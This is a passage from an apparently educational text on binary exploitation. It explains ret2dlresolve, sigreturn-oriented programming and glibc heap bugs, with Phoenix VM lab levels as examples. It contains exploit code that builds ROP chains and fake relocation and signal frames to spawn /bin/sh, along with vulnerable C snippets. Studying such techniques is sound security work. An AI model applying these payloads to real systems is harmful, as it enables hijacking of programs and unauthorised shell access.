4.4 ret2dlresolve 27 JMPREL JMPREL Corresponds to the rel.plt segment and holds the relocation table. This table r_offset r_info maps a symbol to an oset on the GOT. 0x0804a00c 0x00000107 The r_info eld gives us the index of the symbol on the SYMTAB. SYMTAB SYMTAB Symbol table. Stores information about st_name st_... the symbols. The most important eld for this exploit is st_name which is the 1: 0x1a ... oset on the STRTAB structure. STRTAB STRTAB String table. Stores the name of the sym- 0x804822d: libc.so.6 bols. 0x8048246: read 4.4.2 Symbol resolution When linking, the linker is going to replace every dynamic call to an entry on the PLT table, located on the .plt table. The PLT table contains executable code formed by stubs. This stubs will jump to the GOT table to try to execute the intended function if it is resolved but if the function is not present on the GOT table (the function has not been resolved yet) the GOT code will return to the PLT entry to call the resolver. The process for calling a dynamic function is the following: 1. Control is transferred to the .plt entry of the function, for example puts@plt. 2. That .plt entry gets a value from the .got section. This value can have two dierent interpretations: (a) If the symbol has been previously resolved, the value points to where the function has been loaded at runtime. i. Control is transferred to the resolved function, for example puts@libc. (b) If the symbol has not been previously resolved, the value points back to a dierent part of the symbol entry on the .plt. i. Push the reloc_index. This argument is the entry index on the JMPREL table. ii. Jump to the default entry stub on the .plt. A. Push the link_map into the stack. B. Call __dl_runtime_resolve. iii. Call the resolved symbol.
28 Return-oriented programming Every time a symbol is resolved via __dl_runtime_resolve, the corresponding GOT entry is updated to point to the resolved address. Figure 4.19: __dl_runtime_resolve execution path __dl_runtime_resolve receives as parameters the link_map and the reloc_index in the stack, even for x86_64 systems. Then it will move this parameters into rsi and rdi respectively and call _dl_fixup, which is the resolver. The source code for the __dl_runtime_resolve function can be found on the glibc source code. Faking the data structures and passing them to __dl_runtime_resolve() eectively cor- rupts the GOT table and hijacks function calls. __dl_runtime_resolve is in reality only a wrapper for _dl_fixup, which in turns does all the heavy lifting for the symbol resolution. Here we can nd all the computations needed to link the JMPREL, SYMTAB and STRTAB structures together to get the symbol information. Listing 4.4: _dl_fixup pseudocode. 1 #define ELF64_R_SYM ((i) >> 32) 2 3 void* _dl_fixup(struct link_map* l, Elf64_Word reloc_arg) { 4 Elf64_Rela* reloc_entry = JMPREL + (reloc_arg * sizeof(Elf64_Rela)); 5 Elf64_Sym* = symbol_entry = SYMTAB[ELF64_R_SYM(reloc_entry->r_info)]; 6 const char* symbol_string = STRTAB + symbol_entry->st_name; 7 /* ... */ 8 }
4.4 ret2dlresolve 29 Example Now we can use a buer overow to trick __dl_runtime_resolve into resolving the symbols of our choosing. To do that, we need to jump to the start of the .plt section, where the code for pushing the link_list and calling __dl_runtime_resolve is found. Before the jump we need to set on the top of the stack the index on the JMPREL that we want to resolve. This index will have to point to our fake data structures, written on some buer, attending the previous formula. 1 Elf64_Rela* reloc_entry = JMPREL + (reloc_arg * sizeof(Elf64_Rela)); The address of JMPREL can be found by examining the ELF headers of the executable. If the binary has PIE enabled, the value will be an oset from the image base; if PIE is not enabled, the value is an absolute address. 1 readelf -d a.out | grep -e JMPREL -e STRTAB -e SYMTAB Figure 4.20: Addresses of the most important tables for the exploit reloc_arg has as type Elf64_Word, an alias for a 32bit unsigned integer. That imposes a restriction: The distance between the JMPREL and our fake data cannot be greater than 0xffffffff × sizeof(Elf64_Rela) = 0x17FFFFFFE8. Often we only can write to the stack, which is usually too far away from the JMPREL. In order to be in range, we will need to call a read into a more proper location. This exploit is going to have 2 stages: 1. ROP chain to write our fake data structures in another buer near JMPREL, SYMTAB and STRTAB. 2. Jump to __dl_runtime_resolve with reloc_arg pointing into the fake data struc- tures. Stage 1 A simple ROP chain to call read on a convenient address that will write the fake data structures to feed them to the resolver. 20 exploit = b"A" * 64 # buffer 21 exploit += b"A" * 8 # rbp 22 exploit += p64(nop_gadget) 23 exploit += p64(nop_gadget) 24 exploit += p64(nop_gadget) 25
30 Return-oriented programming 26 exploit += p64(set_regs_for_read_gadget) 27 exploit += p64(0) # stdin_fileno 28 exploit += p64(fake_data_addr) # buffer 29 exploit += p64(fake_data_len) # buffer len 30 exploit += p64(syscall_gadget) # read The section where the buer for the fake data will be written must have RW permissions and must be mapped after the tables. To nd such a section we can search on the ELF section headers. Figure 4.21: .data and .bss segments of the process Figure 4.22: Mapped segments of the process I will use the last portion of the last segment of a.out, the address 0x403e00. Because of (0x403e00 − 0x400480) mod 0x18 ≡ 8 the rst two bytes of the second buer will be padding for the relocation entry, that is going to start at 0x403e10, which is divisible by 24. Now we compute the value that __dl_resolve_runtime requires to nd the symbol. (0x403e10 − 0x400480) = 0x266 0x18 That will be the relocation index passed as a parameter to the resolver. 0x3a50 0x3a98 SYMTAB STRTAB JMPREL rel sym system 0x3990 0x43e00 Figure 4.23: Osets from the tables to the second buer
4.4 ret2dlresolve 31 Stage 2 Now we ll the entries in sequence. For the relocation entry, the important eld is r_info. In x86_64 Linux systems, 32 highest bits of this eld hold the oset from the SYMTAB to the symbol entry. The lowest 32 bits stores the type of relocation. To bypass a check in _dl_fixup these bits must be set to 7. The Elf64_Rela struct has one more eld of 64 bits but since this eld is unused, I overlapped it with the symbol entry. This trick also helps me with padding as 0x403e18 is not aligned with SYMTAB. The computation for the index of the symbol entry follows the same scheme that the relocation oset. 42 exploit += p64(got_entry_after_read) # Elf64_Rela.r_offset 43 exploit += p32(0x7) # Elf64_Rela.r_info low 44 exploit += p32(0x271) # Elf64_Rela.r_info high 45 46 exploit += p32(0x3a50) # Elf64_Sym.st_name 47 exploit += p8(0x0) 48 exploit += p8(0x0) The symbol entry has been zeroed out except for the st_name eld which stores the distance in bytes from STRTAB to a string 49 exploit += p16(0x0) 50 exploit += p64(0x0) 51 exploit += p64(0x0) 52 53 exploit += b"system\x00\x00" 54 exploit += b"/bin/sh\x00" 55 56 with open("wer", "wb") as f: 57 f.write(exploit) Now, going back to the ROP chain, we need to invoke __dl_runtime_resolve emulating a legitimate call. To do this, before calling the resolver we need to set up the arguments for system as it is was already resolved and we were calling it directly: with rdi pointing to "/bin/sh". Chaining a pop rdi; ret gadget followed by the address of the "/bin/sh" string that we put on the second buer, after the system string. Once the argument is correctly set, the following byte on the ROP chain should be the address of the start of the .plt section, that as shown in 4.19 stores a default stub for calling the resolver, pushing the link_map into the stack and jumping into __dl_runtime_resolve. 32 exploit += p64(rdi_gadget) 33 exploit += p64(binsh_addr) 34 exploit += p64(plt_start) 35 exploit += p64(reloc_arg) 36 exploit += p64(return_addr) 37 exploit += p64(binsh_addr)
32 Return-oriented programming Figure 4.24: Bytes of the exploit Figure 4.25: Successful exploitation of an ret2dlresolve attack 4.5 Sigreturn-oriented programming Sigreturn-oriented programming (SROP) exploits the mechanism of handling signals on POSIX systems. These systems implement the sigreturn system call, tasked with restoring the CPU registers with stack values, among other things. By corrupting stack values, an attacker can set the CPU register values at will.
4.5 Sigreturn-oriented programming 33 4.5.1 Signal handler mechanism When a signal is triggered, a context switch is performed. A context switch implies that the state of the current execution must be saved, that is, all the CPU registers are pushed onto the stack along with some additional data. Once the signal has been handled, a sigreturn system call is called and the CPU registers values are restored. 4.5.2 sigcontext struct When the sigreturn syscall is called, it expects to found a sigframe struct on the top of the stack. The sigframe is a structure that holds several pieces of information for restoring the context of the process. One of these pieces is the sigcontext struct. The sigcontext struct stores the values of the CPU registers, its ags and the state of the oating point unit. Its denition is dependent on architecture and operating system, but for example, the denition for Linux x86 and x86_64 systems can be found in the Linux kernel source. 4.5.3 SROP SROP is all about creating a fake signal frame on the stack and call sigreturn to control all the registers on the CPU. First, the call to the syscall is triggered with conventional ROP gadgets. On Linux systems, syscalls are invoked in function of the value of rax when the syscall instruction gets executed. The rax value for the sigreturn 0xf on syscall is x86_64 bit Linux systems and 0x77 for x86 bit Linux systems. Once we placed the correct value on rax and executed syscall, sigreturn is going to be executed by the kernel, and it expects a signal frame on the top of the stack. By setting the correct values on the signal frame we can control what we are going to execute next. 0x00 rt_sigreturn uc_flags 0x10 &uc uc_stack.ss_sp buffer uc_stack.ss_flags 0x20 uc_stack.ss_size 0x30 r8 r9 rbp 0x40 r10 r11 0x50 r12 r13 rax gadget 0x60 r14 r15 syscall gadget 0x70 rdi rsi 0x80 rbp rbx 0x90 rdx rax 0xa0 rcx rsp 0xb0 rip eflags signal frame 0xc0 cs/gs/fs/ss err 0xd0 trapno oldmask 0xe0 cr2 &fpstate 0xf0 __reserved sigmask Figure 4.26: Layout of a SROP exploit in Linux x86_64[5]
34 Return-oriented programming Example First, we need a simple ROP chain that calls a system call. For that we need a pop rax gadget that sets the correct syscall number on the rax register. Then we execute the syscall instruction with a syscall gadget. The sigreturn syscall has the number 0xf. Figure 4.27: SROP gadgets 15 exploit = b"A" * (padding) 16 exploit += p64(rax_gadget) # rip 17 exploit += p64(sigreturn_syscall_number) 18 exploit += p64(syscall_gadget) Up to this point this is a normal ROP chain sequence. Now we need to concatenate the sigcontext struct for the sigreturn syscall. We are going to call execve("/bin/sh") from the signal frame. In order to do that, we need to set the correct registers. rdi : executable le path to run. In our case it is the address of a "/bin/sh" string. rax : 0x3b, the execve syscall number. rsp : zeroing this value can be dangerous and cause a segfault. Just point it to some random stack address. rip : because execve is a system call we can reuse the syscall gadget we used previously on the ROP chain. cs : code segment. Used implicitly in the instructions that modify control ow. Necessary to jump around. The value is taken from debugging the program. ss : another segment register. Zeroing it causes segfault. The value is taken from debug- ging the program. All the other elds are zeroed out.
4.5 Sigreturn-oriented programming 35 Figure 4.28: SROP payload
36 Return-oriented programming Figure 4.29: Successful exploitation of an SROP exploit
Chapter 5 Heap exploits 5.1 The heap The heap is a common term to refer to a portion of memory where programs can allocate memory at runtime for objects whom size is very large or unknown at compile time, and therefore, the compiler cannot manage the stack for them. This portion of memory is very often managed by libraries called allocators, in charge of keeping a record of the allocated and freed memory, its size, the possibility of reusing freed chunks and the merging of freed chunks to avoid heap fragmentation. The C standard includes denitions for a set of heap functions common for everyone but the implementation is OS and library-dependent. malloc realloc calloc free 5.2 glibc malloc The GNU C malloc library contains implementations for the standard malloc functions, malloc, free, realloc, and calloc. This allocator manages the blocks of memory handled to a program in a "heap" style. The GNU malloc implementation is derived from ptmalloc (pthread's malloc) and in turn, ptmalloc derives from dlmalloc (Doug Lea's malloc). 5.2.1 Common terms Arena An arena is a region of memory dedicated to the allocator. Arenas hold references to one or more heaps from which they allocate and free memory. When a program is started, a main arena is created, that holds a reference to the initial heal. When more threads request allocations, more arenas can be created to avoid locking the main arena and causing a bottle-neck that could slow down the program. 37
38 Heap exploits Heap Portion of memory reserved for allocations. This memory is subdivided into chunks handled by the allocator. Heap memory is contiguous, meaning that the are adjacent to one another. Chunk Subdivision of a heap. It is a block of memory with a certain size requested by the pro- gram. Chunks can be merged with neighboring chunks to obtain a larger chunk, or can be subdivided further to obtain smaller chunks, depending on the needs of the program. When a chunk is freed, it gets pushed into a circular double-linked list called bin. To save up space, all the information required for the linked list management is stored on the chunk contents. This metadata includes forward and backward pointers and the size of the neighboring chunks. [source code] size ags size ags fwd pointer bck pointer contents contents ... previous size Figure 5.1: Allocated chunk structure Figure 5.2: Freed chunk structure Tcache The Thread Local Cache is a special list of very recently freed chunks with the intention to be of quick access. It acts as a cache for freed chunks. Each thread owns a tcache containing a small collection of freed chunks for rapid access without the need to lock global variables or data structures like the arena, which is common for all threads under a process, to prevent data races. The data structure is an array of bins, each bin being a linked list for chunks of certain sizes. tcache size bin 0x20 ... 0x30 ... 0x40 ... 0x50 0x55aabb -> 0x55ccdd -> 0x0 Figure 5.3: Tcache structure This optimization is present from glibc version 2.26 upwards.
5.3 Heap overows 39 5.3 Heap overows Because chunks are contiguous in memory, we can overow a heap buer with more data than it can handle using unbounded write/read functions, just like a normal stack overow. write size ags contents size ags contents Figure 5.4: Heap overow Example To showcase this vulnerability I am going to solve the level heap-one from Phoenix VM . 1 struct heapStructure { 2 int priority; 3 char *name; 4 }; 5 6 int main(int argc, char **argv) { 7 struct heapStructure *i1, *i2; 8 9 i1 = malloc(sizeof(struct heapStructure)); 10 i1->priority = 1; 11 i1->name = malloc(8); 12 13 i2 = malloc(sizeof(struct heapStructure)); 14 i2->priority = 2; 15 i2->name = malloc(8); 16 17 strcpy(i1->name, argv[1]); 18 strcpy(i2->name, argv[2]); 19 // ... Thanks to the structures and the unbounded writes with the strcpy functions we can trigger an arbitrary write exploit. The second call to strcpy &name from the will take as a pointer second struct. Because heap chunks are contiguous, the rst strcpy call can keep writing data past the extent of i1.name into the second structure. i1 i2 priority padding &name name priority padding &name name strcpy &return_address &winner Figure 5.5: heap-one@phoenix
40 Heap exploits We will use the rst strcpy to override i2.name to point to another address where the value on the second argument will be written. In this case, I am overwriting it with the address of the return address on the stack and the second argument has the address of the winner function, performing a classical ret2win exploit but overriding data on the heap. Listing 5.1: Pseudocode of the exploit 1 strcpy(&return_address, &winner); Figure 5.6: heap-one solved 5.4 Use-After-Free An Use-After-Free vulnerability consists of the use of a chunk after it has been freed. 1 #include 2 #include 3 4 int main() 5 { 6 char* buffer = malloc(sizeof(char) * 32); 7 8 free(buffer); 9 10 /* buffer still points to the chunk contents */ 11 12 memset(buffer, 0x41, sizeof(char) * 32); 13 14 return 0; 15 } Example To exemplify an UAF I will use heap-two from Phoenix VM . This program consist of a menu allowing us to perform some actions in arbitrary order over some global variables. The program will check for the value of a variable inside the auth struct. By allocating and then freeing it we can force the following call to malloc returns us the same chunk that was allocated for the auth struct. Because the auth pointer is never cleared it points to the chunk that now belongs to the service variable, which we can control. By writing on service we are also writing on auth, therefore setting the correct value that the challenge expects to be completed.
5.5 Double free 41 Figure 5.7: heap-two@Phoenix 5.5 Double free A double free consists of calling free two consecutive times on the same chunk. This causes a corruption on the allocator's data structures: the same chunk is appended two times to the free chunks list and the subsequent mallocs are going to return the same chunk to two dierent calls. 1 #include 2 3 int main() 4 { 5 void* a = malloc(8); 6 append append 7 free(a); 8 free(a); free bin a's chunk a's chunk 11 12 void* b = malloc(8); malloc 13 void* c = malloc(8); malloc 14 15 /* b and c point to the same address */ 16 17 return 0; 18 } Figure 5.8: Double free vulnerability
You can also read